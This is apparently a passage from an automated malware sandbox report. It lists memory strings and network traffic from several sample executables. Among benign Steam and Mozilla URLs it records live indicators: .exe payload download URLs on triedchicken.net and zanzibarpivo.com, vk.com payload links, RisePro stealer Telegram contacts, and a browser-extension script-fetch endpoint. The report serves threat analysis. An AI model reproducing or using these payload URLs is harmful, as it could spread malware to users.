Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/e
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397504517.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397504517.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2376756856.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2396715290.0000000005E8D000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2379052990.0000000005FD9000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397820481.0000000006005000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000056C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2376756856.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2396715290.0000000005E8D000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2379052990.0000000005FD9000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397820481.0000000006005000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000056C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000056C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17ontdrvhost.exe
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2552343455.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.000000000184E000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2542152281.0000000005F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORT
Source: 9RJ0JeM9uj2rfsuq_woBmmIY.exe, 00000015.00000002.1951214705.0000000000E29000.00000004.00000001.01000000.00000012.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/r1g1o
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot.96
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot9x
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botQ=
Source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2733749544.000001C5001C1000.00000004.00000800.00020000.00000000.sdmp, ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2733749544.000001C5001AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://thridparty.nservices.org/api/browser/GetScript?id=$
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/:
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002BFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/cad54ba5b01423b1af8ec10ab5719d97.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002BFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/cad54ba5b01423b1af8ec10ab5719d97.exexeK
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002BFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://triedchicken.net/cad54ba5b01423b1af8ec10ab5719d97.exez
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/3
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc5294803_668917518?hash=HcqSqB4BEz69zZduDzHpG5p3oDuUGmC4h5HdrueZTFD&dl=73Wmq1mPc
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002BFB000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc5294803_669132669?hash=ZKjz6ih7UQ9lzkD21VhcvrQwcwdE4E0ZYGiugVcv47k&dl=WempMPmw6
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397250157.0000000005E9E000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378223753.0000000005E88000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2378676835.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399977559.0000000006027000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2394268324.0000000006009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/06
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397250157.0000000005E9E000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378223753.0000000005E88000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2378676835.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399977559.0000000006027000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2394268324.0000000006009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: hvkESMr10WtP7_E6btIJmDx0.exe	String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397504517.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397504517.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2552343455.0000000005E5C000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2552343455.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2377471770.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2393772444.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2371991780.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378969288.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378488519.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2374464078.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2376962021.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2542152281.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2400872716.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399082030.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2401550141.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397504517.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/a
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397504517.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2552343455.0000000005E5C000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/efox/Y
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2552343455.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2377471770.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2393772444.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2371991780.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378969288.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378488519.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2374464078.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2376962021.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2542152281.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2400872716.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399082030.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2401550141.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2397504517.0000000005FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/r
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/refox
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.security.us.panasonic.com
Source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2733749544.000001C5001C1000.00000004.00000800.00020000.00000000.sdmp, background.js.9.dr	String found in binary or memory: https://www.srvstattis.top/go/a1092825-4fdd-4f87-a9d5-b6b7def0d417?q=
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ssl.com/repository0
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: https://www.thawte.com/repository0W
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2733749544.000001C5001C1000.00000004.00000800.00020000.00000000.sdmp, background.js.9.dr	String found in binary or memory: https://xot.traxa41.net
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zanzibarpivo.com/
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002BFB000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zanzibarpivo.com/7725eaa6592c80f8124e769b4e8a07f7.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zanzibarpivo.com/7725eaa6592c80f8124e769b4e8a07f7.exexe
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zanzibarpivo.com/z
Source: WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zanzibarpivo.com:80/7725eaa6592c80f8124e769b4e8a07f7.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zanzibarpivo.com:80/7725eaa6592c80f8124e769b4e8a07f7.exeK

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
